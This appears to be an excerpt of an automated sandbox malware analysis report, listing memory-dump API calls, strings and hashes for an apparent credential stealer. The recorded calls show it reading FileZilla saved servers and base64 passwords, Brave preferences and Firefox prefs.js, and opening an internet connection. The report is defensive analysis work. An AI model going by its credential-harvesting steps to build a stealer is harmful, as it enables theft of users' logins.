                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: 43e04935b6c0c4a88c27867355cc6f42505f14bc611d0779208eb0321f337b35
                            • Instruction ID: be451894cd766b3fd01f7b55ea621cb522ef596c6d1986e47f8e3c90e31c649d
                            • Opcode Fuzzy Hash: 43e04935b6c0c4a88c27867355cc6f42505f14bc611d0779208eb0321f337b35
                            • Instruction Fuzzy Hash: 8F924171A107169BCB21AFB8DC89AAE7FF9EF44300F0445A4F815E7291DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B118D2
                            • lstrlen.KERNEL32(\*.*), ref: 00B118DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B118FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B1190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B11947
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B11967
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11981
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B119BF
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B119F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11A4C
                            • lstrlen.KERNEL32(00B31794), ref: 00B11A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11A80
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11AB4
                            • lstrlen.KERNEL32(?), ref: 00B11AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B19
                            • lstrlen.KERNEL32(01878AB8), ref: 00B11B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11B8F
                            • lstrlen.KERNEL32(00B31794), ref: 00B11BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11BC3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C57
                            • lstrlen.KERNEL32(00B31794), ref: 00B11C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11C8B
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D21
                            • lstrlen.KERNEL32(00B31794), ref: 00B11D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D55
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B11DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11DED
                            • lstrlen.KERNEL32(00B31794), ref: 00B11E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11E36
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11E68
                            • lstrlen.KERNEL32(0187D3D0), ref: 00B11E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11EB2
                            • lstrlen.KERNEL32(00B31794), ref: 00B11EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11EE3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F15
                            • lstrlen.KERNEL32(0187DCB0), ref: 00B11F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F5F
                            • lstrlen.KERNEL32(00B31794), ref: 00B11F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11F90
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11FC2
                            • lstrlen.KERNEL32(0186A640), ref: 00B11FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12036
                            • lstrlen.KERNEL32(00B31794), ref: 00B12048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12067
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B12073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12098
                            • lstrlen.KERNEL32(?), ref: 00B120AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B120D0
                            • lstrcat.KERNEL32(00000000,?), ref: 00B120DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12103
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1213F
                            • lstrlen.KERNEL32(0187D280), ref: 00B1214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B12176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12181
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: a2564c2e6bba33b6cb66c50aedd0753bc3b6bf7a8f89c37f05bb6318bff22cca
                            • Instruction ID: c934ace54dc11c05ca570117a4c8cdcca1fc7fca97c384ebdb2fa12f52eedfab
                            • Opcode Fuzzy Hash: a2564c2e6bba33b6cb66c50aedd0753bc3b6bf7a8f89c37f05bb6318bff22cca
                            • Instruction Fuzzy Hash: 37624C31A117169BCB21AF68DC88AEEBBF9EF44700F4405A4F905E7291DB74DD49CBA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B13943
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1396C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B13986
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B139BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B139E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B139F2
                            • lstrlen.KERNEL32(00B31794), ref: 00B139FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A1A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13A26
                            • lstrlen.KERNEL32(?), ref: 00B13A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A8A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B13ACE
                            • lstrlen.KERNEL32(?), ref: 00B13AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B36
                            • lstrlen.KERNEL32(00B31794), ref: 00B13B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B6A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B9E
                            • lstrlen.KERNEL32(?), ref: 00B13BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13BE0
                            • lstrlen.KERNEL32(01878C38), ref: 00B13C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13C3C
                            • lstrlen.KERNEL32(01878AB8), ref: 00B13C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13CB7
                            • lstrlen.KERNEL32(00B31794), ref: 00B13CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13CE8
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B13D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13D79
                            • lstrlen.KERNEL32(00B31794), ref: 00B13D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13DAD
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E43
                            • lstrlen.KERNEL32(00B31794), ref: 00B13E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13E77
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B13EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F0D
                            • lstrlen.KERNEL32(00B31794), ref: 00B13F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F41
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B13F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13F75
                            • lstrlen.KERNEL32(?), ref: 00B13F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00B13FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B13FE0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1401F
                            • lstrlen.KERNEL32(0187D280), ref: 00B1402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B140CE
                            • lstrcat.KERNEL32(00000000), ref: 00B140DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B142D9
                            • FindClose.KERNEL32(00000000), ref: 00B142E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: f20b3941c943befb9b3a9e4fff284c4b5098a76ccfe38ac4ede46cba3383b299
                            • Instruction ID: 60daebc50568b13f4a0f626e545212b4e78e7b8b14d42cfce9494a133c53a096
                            • Opcode Fuzzy Hash: f20b3941c943befb9b3a9e4fff284c4b5098a76ccfe38ac4ede46cba3383b299
                            • Instruction Fuzzy Hash: FF622F71A117169BCB21AF68DC49AEEBBF9EF44700F4441A4F805E7290EB74DD49CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B169C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B16A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00B16A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00B16AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B16B35
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16B9D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: ff3aec87674f11069bae1949850281170e2a834adacd882e02fdd058caa70d8d
                            • Instruction ID: 42d6ecd3883f87f1c74f589fd7b8f18f98e6ea807f3ff4cd1d050be068a8ef05
                            • Opcode Fuzzy Hash: ff3aec87674f11069bae1949850281170e2a834adacd882e02fdd058caa70d8d
                            • Instruction Fuzzy Hash: 44429F30A10716ABCB21ABB4DD89AAEBBF9EF44700F5444A4F805E7291DF74DD49CB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DBEF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B0DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC17
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B0DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC4C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DC8F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B0DCD0
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B0DCF0
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B0DD0A
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B0DD1D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DD7B
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDA3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DDAF
                            • lstrlen.KERNEL32(?), ref: 00B0DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DE19
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DE6F
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DE7B
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DEBB
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DEE6
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DEF2
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFA5
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DFB1
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DFF4
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E022
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0E02E
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00B0E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00B0E0E7
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E11F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E19F
                            • lstrcat.KERNEL32(00000000), ref: 00B0E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E1F9
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E22F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E261
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B0E269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B0E988
                            • FindClose.KERNEL32(00000000), ref: 00B0E997
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 9a599599f176ee1730af7a45a3d0ae75105d3d297166d7cf713647744ed84282
                            • Instruction ID: cdfbe7993534bae23c4b6dae7c49521a5166c50bbb55ba3ccd2bb86c616e8993
                            • Opcode Fuzzy Hash: 9a599599f176ee1730af7a45a3d0ae75105d3d297166d7cf713647744ed84282
                            • Instruction Fuzzy Hash: EB525171A117169BCB21AFB8DC89AAE7FF9EF44300F0445A4F815E7291DB74DC498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B060FF
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06152
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06185
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B061B5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B061F0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B06223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B06233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 0c6d2e918249b818c4312b348128b17905a98e4de0287d824a361bf5cd8727fb
                            • Instruction ID: 996aa4d5362e73b93ece60be3ad72118366289f3a780b4e0fcc2633c54bd99ff
                            • Opcode Fuzzy Hash: 0c6d2e918249b818c4312b348128b17905a98e4de0287d824a361bf5cd8727fb
                            • Instruction Fuzzy Hash: B2522F71A107169BDB21EFB8DC49A9EBBF9EF44300F1445A4F805E7291DB74ED068BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16B9D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BCD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16BFD
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00B16C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B16C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B16C5A
                            • lstrlen.KERNEL32(00000000), ref: 00B16C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B16CE2
                            • lstrlen.KERNEL32(00000000), ref: 00B16CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00B16D6A
                            • lstrlen.KERNEL32(00000000), ref: 00B16D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B16DF2
                            • lstrlen.KERNEL32(00000000), ref: 00B16E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00B16E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B16EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00B16EC9
                            • LocalFree.KERNEL32(00000000), ref: 00B16ED4
                            • lstrlen.KERNEL32(?), ref: 00B16F6E
                            • lstrlen.KERNEL32(?), ref: 00B16F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 322000499a5642531d71d6a58e4d256a898b7712c3df502018f941c83c6ba834
                            • Instruction ID: 590e346bd0aaa74061f44d91f7693079799a769c48395d03ac51ae8bc306e3eb
                            • Opcode Fuzzy Hash: 322000499a5642531d71d6a58e4d256a898b7712c3df502018f941c83c6ba834
                            • Instruction Fuzzy Hash: 7F02A231A01315ABCB11ABB8DD8DA9EBBF9EF44700F5444A4F806E7291DF74DD458BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14B7F
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B14B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BA7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B14BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B14BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: 9d3ea5d5e644a957efbacb5795f3cff0bb01e9e44b2ba414c7c6ad3ded871d98
                            • Instruction ID: 86b25e0c8d70ddbca38121d1f5e9ac5eb9532196c9ce323868317ac42c9fdc19
                            • Opcode Fuzzy Hash: 9d3ea5d5e644a957efbacb5795f3cff0bb01e9e44b2ba414c7c6ad3ded871d98
                            • Instruction Fuzzy Hash: 44921B70A01701CFDB25CF29D958AAAB7E5EF84714F5980E9E809DB3A1D771DC82CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B11291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B112BF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B112CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112E7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B112F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B1133A
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1135C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11376
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B113AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B113D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B113E2
                            • lstrlen.KERNEL32(00B31794), ref: 00B113ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1140A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11416
                            • lstrlen.KERNEL32(?), ref: 00B11423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11443
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1147A
                            • StrCmpCA.SHLWAPI(?,0187D418), ref: 00B114A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B114E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11535
                            • StrCmpCA.SHLWAPI(?,0187DB70), ref: 00B11552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B115BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B115E4
                            • StrCmpCA.SHLWAPI(?,0187D2E0), ref: 00B11602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11633
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11685
                            • StrCmpCA.SHLWAPI(?,0187D3A0), ref: 00B116B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B116F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11745
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B117BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B117F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1181C
                            • FindClose.KERNEL32(00000000), ref: 00B1182B
                            Memory Dump Source
